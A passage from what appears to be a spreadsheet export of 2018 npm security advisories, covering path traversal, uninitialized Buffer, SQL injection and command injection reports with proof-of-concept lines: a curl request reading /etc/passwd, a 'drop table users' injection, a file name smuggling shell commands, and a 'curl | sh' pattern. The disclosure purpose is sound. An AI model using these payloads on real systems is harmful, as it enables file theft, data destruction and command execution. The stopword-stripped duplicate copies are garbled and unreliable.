&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.2&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;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&lt;h2 id="impact"&gt;Impact:&lt;/h2&gt;
&lt;p&gt;This vulnerability allows malisious user to read content of any file on machine where similar to presented app is running. This might expose vectors to attack system with Remote Code Execution, reveals files with usernames and passwords and many other possibilites.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-19T00:52:41.776Z</t>
  </si>
  <si>
    <t>2018-05-19T12:55:48.532Z</t>
  </si>
  <si>
    <t>Impact:This vulnerability allows malisious user to read content of any file on machine where similar to presented app is running. This might expose vectors to attack system with Remote Code Execution, reveals files with usernames and passwords and many other possibilites.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  report Directory Traversal vulnerability found html pages module.  Module    html pages module allows browse directories  serve static files browser. vulnerability exists latest available version (2.0.7)  Link npm page  https //www.npmjs.com/package/html pages  Summary    When html pages server run, browser does not allow toread files arbitrary locations. However, I"ve noticed using simple bypasses %2e (.) %2f (/) easily go directory tree.  it"s not possible open file browser, due characters used path, directory listing available     However, simple curl call read file remote server html pages runs  $ curl  v   path http //localhost 8000/../../../../../Users/bl4de/.vimrc    part code, read directory content, does not validate against Directory Traversal way, literally makes root config setting useless   https //github.com/danielcardoso/html pages/blob/master/lib/server.js#L122  vulnerability exploited regardless html pages configuration settings, root. files server read malicious user.  Steps Reproduce    install html pages   $ npm install html pages   create simple application uses html pages serving static files local server   const pages = require("html pages")  const pagesServer = pages(__dirname, {     port  8000,     "directory index"  "",     "root"  "./",     "no clipboard"  true,     ignore  [".git", "node_modules"] })   run application   $ node   open browser go 8000 directories files directory, run. Now, try modify url something 8000/.%2e/.%2e/   content directory two levels file tree displayed. Try open directory file (if available) clicking its name.   notice application actually hangs on.    terminal, execute following command (please adjust numbers ../ system)   $ curl  v   path http //127.0.0.1 8000/../../../../../etc/passwd  content /etc/passwd file     Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.2 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  Impact   vulnerability allows malisious user read content file machine similar presented app running. expose vectors attack system Remote Code Execution, reveals files usernames passwords possibilites. </t>
  </si>
  <si>
    <t>Impact:This vulnerability allows malisious user read content file machine similar presented app running. expose vectors attack system Remote Code Execution, reveals files usernames passwords possibilites.</t>
  </si>
  <si>
    <t>`stringstream` allocates uninitialized Buffers when number is passed in input stream on Node.js 4.x and below</t>
  </si>
  <si>
    <t>/advisories/664</t>
  </si>
  <si>
    <t>2018-05-16T19:40:44.622+00:00</t>
  </si>
  <si>
    <t>stringstream</t>
  </si>
  <si>
    <t>https://www.npmjs.com/stringstream</t>
  </si>
  <si>
    <t>&lt;=0.0.5</t>
  </si>
  <si>
    <t>&gt;=0.0.6</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/321670.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report n uninitialized Buffer allocation issue in &lt;code&gt;stringstream&lt;/code&gt;.&lt;br&gt;
It allows to extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in setups where typed user input can be passed to the stream (e.g. from JSON), on Node.js 4.x and lower.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;stringstream&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.0.5&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/stringstream&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Decode streams into strings The Right Way(tm)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;740 368 downloads in the last day&lt;br&gt;
4 606 368 downloads in the last week&lt;br&gt;
19 182 466 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;See &lt;a title="https://github.com/mhart/StringStream/blob/v0.0.5/stringstream.js#L32" href="/redirect?signature=69955a4a61418a3d937941b4da787dc10255c89a&amp;amp;url=https%3A%2F%2Fgithub.com%2Fmhart%2FStringStream%2Fblob%2Fv0.0.5%2Fstringstream.js%23L32" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/mhart/StringStream/blob/v0.0.5/stringstream.js#L32&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem arises when a number is passed in the stream. That is unlikely to be attacker-controlled in real-world setups, but still possible. The API should not propagate the already-bad Buffer issue further.&lt;/p&gt;
&lt;p&gt;On Node.js 4.x and below (4.x is still supported), this exposes uninitialized memory, which could contain sensitive data.&lt;/p&gt;
&lt;p&gt;On Node.js 6.x and newer, this is type-checked on Node.js side and thows an error there.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;stringstream&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;stringstream&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;stream&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;stringstream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;utf8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pipe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nx"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Run on Node.js 4.x (or lower). &lt;code&gt;hex&lt;/code&gt;/&lt;code&gt;utf8&lt;/code&gt; is irrelevant, the issue is reproducable with all encodings.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 4.8.7&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Sensitive uninitialized memory exposure&lt;br&gt;
Denail of Service&lt;br&gt;
This issue affects only setups using Node.js 4.x (still supported) or lower.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-03T21:51:21.472Z</t>
  </si>
  <si>
    <t>2018-05-11T14:54:16.685Z</t>
  </si>
  <si>
    <t>See https://github.com/mhart/StringStream/blob/v0.0.5/stringstream.js#L32</t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure
Denail of Service
This issue affects only setups using Node.js 4.x (still supported) or lower.</t>
  </si>
  <si>
    <t xml:space="preserve">report n uninitialized Buffer allocation issue stringstream. allows extract sensitive data uninitialized memory cause DoS passing large number, setups typed user input passed stream (e.g. JSON), 4.x lower.  Module  module name  stringstream version  0.0.5 npm page  https //www.npmjs.com/package/stringstream  Module Description   Decode streams strings Right Way(tm)   Module Stats  740 368 downloads last day 4 606 368 downloads last week 19 182 466 downloads last month  Vulnerability  Vulnerability Description  https //github.com/mhart/StringStream/blob/v0.0.5/stringstream.js#L32  problem arises when number passed stream. unlikely attacker controlled real world setups, possible. API not propagate already bad Buffer issue further.  4.x below (4.x supported), exposes uninitialized memory, contain sensitive data.  6.x newer, type checked side thows error there.  Steps Reproduce  var stringstream = require("stringstream") var stream = stringstream("hex", "utf8") stream.pipe(process.stdout) stream.write(10000); stream.end();  Run 4.x (or lower). hex/utf8 irrelevant, issue reproducable encodings.  Supporting Material/References    Arch Linux Current 4.8.7   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Sensitive uninitialized memory exposure Denail Service issue affects setups using 4.x (still supported) lower. </t>
  </si>
  <si>
    <t>Sensitive uninitialized memory exposure
Denail Service
This issue affects setups using 4.x (still supported) lower.</t>
  </si>
  <si>
    <t>/advisories/663</t>
  </si>
  <si>
    <t>2018-05-16T19:36:44.497+00:00</t>
  </si>
  <si>
    <t>open</t>
  </si>
  <si>
    <t>https://www.npmjs.com/open</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319473.json</t>
  </si>
  <si>
    <t>`sql` does not properly escape parameters when building SQL queries, resulting in potential SQLi</t>
  </si>
  <si>
    <t>/advisories/662</t>
  </si>
  <si>
    <t>2018-05-16T19:32:17.12+00:00</t>
  </si>
  <si>
    <t>sql</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sql</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319465.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report an SQLi in &lt;code&gt;sql&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It allows to insert potentially user-controlled content into the queries without proper escaping, in cases where that is not verified additionally in the applications that are using &lt;code&gt;sql&lt;/code&gt; library.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; sql&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.78.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/sql&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;sql string builder for node - supports PostgreSQL, mysql, Microsoft SQL Server, Oracle and sqlite dialects.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;Stats&lt;br&gt;
345 downloads in the last day&lt;br&gt;
6 659 downloads in the last week&lt;br&gt;
24 915 downloads in the last month&lt;/p&gt;
&lt;p&gt;~298980 estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;sql&lt;/code&gt; module constructs SQL queries from structured input, and the problem is that it doesn&amp;#39;t do proper escaping of limit/offset parameters, so in setups where those are user-controlled (e.g. received over network) without additional validation that can cause an SQL injection vulnerability.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;sql&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sql&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;columns&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;email&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;lastLogin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;select&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;star&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;limit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1; drop table users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;toQuery&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;select&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;star&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;offset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1; drop table users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;toQuery&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SELECT &amp;quot;users&amp;quot;.* FROM &amp;quot;users&amp;quot; LIMIT 1; drop table users
SELECT &amp;quot;users&amp;quot;.* FROM &amp;quot;users&amp;quot; OFFSET 1; drop table users
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;SQL injection.&lt;br&gt;
See &lt;a title="https://www.owasp.org/index.php/SQL_Injection" href="/redirect?signature=707e5861c69f222151879a380c03c4ace36cb373&amp;amp;url=https%3A%2F%2Fwww.owasp.org%2Findex.php%2FSQL_Injection" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.owasp.org/index.php/SQL_Injection&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The hacker selected the &lt;strong&gt;SQL Injection&lt;/strong&gt; weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Verified&lt;/strong&gt;&lt;br&gt;
Yes&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What exploitation technique did you utilize?&lt;/strong&gt;&lt;br&gt;
Classic / In-Band&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Please describe the results of your verification attempt.&lt;/strong&gt;&lt;br&gt;
Observed constructed SQL queries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-25T04:52:58.183Z</t>
  </si>
  <si>
    <t>2018-05-12T09:03:10.844Z</t>
  </si>
  <si>
    <t>sql module constructs SQL queries from structured input, and the problem is that it doesn't do proper escaping of limit/offset parameters, so in setups where those are user-controlled (e.g. received over network) without additional validation that can cause an SQL injection vulnerability.</t>
  </si>
  <si>
    <t>SQL injection.
See https://www.owasp.org/index.php/SQL_Injection</t>
  </si>
  <si>
    <t xml:space="preserve">report SQLi sql.  allows insert potentially user controlled content queries without proper escaping, cases not verified additionally applications using sql library.  Module  module name  sql version  0.78.0 npm page  https //www.npmjs.com/package/sql  Module Description   sql string builder node   supports PostgreSQL, mysql, Microsoft SQL Server, Oracle sqlite dialects.   Module Stats  Stats 345 downloads last day 6 659 downloads last week 24 915 downloads last month  ~298980 estimated downloads per year  Vulnerability  Vulnerability Description  sql module constructs SQL queries structured input, problem doesn"t proper escaping limit/offset parameters, so setups user controlled (e.g. received network) without additional validation cause SQL injection vulnerability.  Steps Reproduce  var sql = require("sql"); var user = sql.define({   name  "users",   columns  ["id", "name", "email", "lastLogin"] }); console.log(user.select(user.star()).from(user).limit("1; drop table users").toQuery().text); console.log(user.select(user.star()).from(user).offset("1; drop table users").toQuery().text);  Output  SELECT Â« Â»usersÂ« Â».* Â« Â»usersÂ« Â» LIMIT 1; drop table users SELECT Â« Â»usersÂ« Â».* Â« Â»usersÂ« Â» OFFSET 1; drop table users  Supporting Material/References    State technical information stack vulnerability found    Arch Linux Current 9.5.0 npm 5.6.0   Wrap   contacted maintainer let know  N  opened issue related repository  N   Impact  SQL injection. https //www.owasp.org/index.php/SQL_Injection  hacker selected SQL Injection weakness. vulnerability type requires contextual information hacker. provided following answers   Verified Yes  exploitation technique utilize? Classic / Band  Please describe results verification attempt. Observed constructed SQL queries. </t>
  </si>
  <si>
    <t>SQL injection.
See</t>
  </si>
  <si>
    <t>`fs-path` concatenates unsanitized input into exec()/execSync() commands</t>
  </si>
  <si>
    <t>/advisories/661</t>
  </si>
  <si>
    <t>2018-05-16T19:29:24.075+00:00</t>
  </si>
  <si>
    <t>fs-path</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fs-path</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/324491.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report command injection in &lt;code&gt;fs-path&lt;/code&gt;.&lt;br&gt;
It allows to inject and execute arbitrary shell commands while performing various operations from &lt;code&gt;fs-path&lt;/code&gt; API like copying files.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;fs-path&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.0.24&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/fs-path&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Useful file utitiles.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;108 downloads in the last day&lt;br&gt;
2 916 downloads in the last week&lt;br&gt;
13 186 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;Arguments are not properly escaped before being concatenated into the command that is passed to &lt;code&gt;exec()&lt;/code&gt;/&lt;code&gt;execSync()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;See &lt;a title="https://github.com/pillys/fs-path/blob/master/lib/index.js" href="/redirect?signature=4ee031787be6ede78881fa3e783814fce81e87aa&amp;amp;url=https%3A%2F%2Fgithub.com%2Fpillys%2Ffs-path%2Fblob%2Fmaster%2Flib%2Findex.js" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/pillys/fs-path/blob/master/lib/index.js&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;fsPath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;fs-path&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;source&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/bin/ls&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;target&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;  &lt;span class="s1"&gt;&amp;#39;/tmp/foo;rm\t/tmp/foo;whoami&amp;gt;\t/tmp/bar&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nx"&gt;fsPath&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;copySync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;source&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;target&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Observe &lt;code&gt;/tmp/bar&lt;/code&gt; being created with &lt;code&gt;whoami&lt;/code&gt; output.&lt;/p&gt;
&lt;p&gt;The same issue affects other methods in &lt;code&gt;fs-path&lt;/code&gt; API, not just &lt;code&gt;copySync&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;The suggested fix is to avoid using &lt;code&gt;exec&lt;/code&gt;/&lt;code&gt;execSync&lt;/code&gt; and instead pass parameters as an array of arguments to corresponding &lt;code&gt;child_process&lt;/code&gt; methods.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux current&lt;/li&gt;
&lt;li&gt;Node.js 9.7.1&lt;/li&gt;
&lt;li&gt;npm 5.7.1&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;For setups where user input could end up in arguments of calls to &lt;code&gt;fs-wrap&lt;/code&gt; API (like filename etc), users would be able to execute arbitrary shell commands.&lt;/p&gt;
&lt;p&gt;Note that sanitization of user input on the application side might not prevent this issue, as simple path sanitization that removes stuff &lt;code&gt;/&lt;/code&gt; and &lt;code&gt;..&lt;/code&gt; is not enough â€” commands like &lt;code&gt;curl example.org | sh&lt;/code&gt; might pass through sanitization of user input (like filenames etc.) on the application side.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-11T20:19:23.918Z</t>
  </si>
  <si>
    <t>2018-05-11T15:19:57.573Z</t>
  </si>
  <si>
    <t>Arguments are not properly escaped before being concatenated into the command that is passed to exec()/execSync().</t>
  </si>
  <si>
    <t>For setups where user input could end up in arguments of calls to fs-wrap API (like filename etc), users would be able to execute arbitrary shell commands.</t>
  </si>
  <si>
    <t xml:space="preserve">report command injection fs path. allows inject execute arbitrary shell commands performing various operations fs path API copying files.  Module  module name  fs path version  0.0.24 npm page  https //www.npmjs.com/package/fs path  Module Description   Useful file utitiles.   Module Stats  108 downloads last day 2 916 downloads last week 13 186 downloads last month  Vulnerability  Vulnerability Description  Arguments not properly escaped concatenated command passed exec()/execSync().  https //github.com/pillys/fs path/blob/master/lib/index.js  Steps Reproduce  const fsPath = require("fs path"); const source = "/bin/ls"; const target =  "/tmp/foo;rm t/tmp/foo;whoami  t/tmp/bar"; fsPath.copySync(source, target);  Observe /tmp/bar created whoami output.  issue affects methods fs path API, not just copySync.  Patch  suggested fix avoid using exec/execSync instead pass parameters array arguments corresponding child_process methods.  Supporting Material/References    Arch Linux current 9.7.1 npm 5.7.1   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  setups user input end arguments calls fs wrap API (like filename etc), users able execute arbitrary shell commands.  Note sanitization user input application side not prevent issue, simple path sanitization removes stuff / .. not enough â€” commands curl | sh pass sanitization user input (like filenames etc.) application side. </t>
  </si>
  <si>
    <t>setups user input end arguments calls fs-wrap API (like filename etc), users able execute arbitrary shell commands.</t>
  </si>
  <si>
    <t>`base64-url` below 2.0 allocates uninitialized Buffers when number is passed in input</t>
  </si>
  <si>
    <t>/advisories/660</t>
  </si>
  <si>
    <t>2018-05-16T19:26:29.126+00:00</t>
  </si>
  <si>
    <t>base64-url</t>
  </si>
  <si>
    <t>https://www.npmjs.com/base64-url</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/321692.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report an uninitialized Buffer allocation issue in &lt;code&gt;base64-url&lt;/code&gt;.&lt;br&gt;
It allows to extract sensitive data from uninitialized memory or to cause a DoS by passing in a large number, in setups where typed user input can be passed (e.g. from JSON).&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;base64-url&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.3.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/base64-url&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Base64 encode, decode, escape and unescape for URL applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;48 047 downloads in the last day&lt;br&gt;
311 047 downloads in the last week&lt;br&gt;
1 374 420 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;The problem arises when a number is passed in, e.g. from user-submitted JSON-encoded data.&lt;br&gt;
The API should not propagate the already-bad Buffer issue further.&lt;/p&gt;
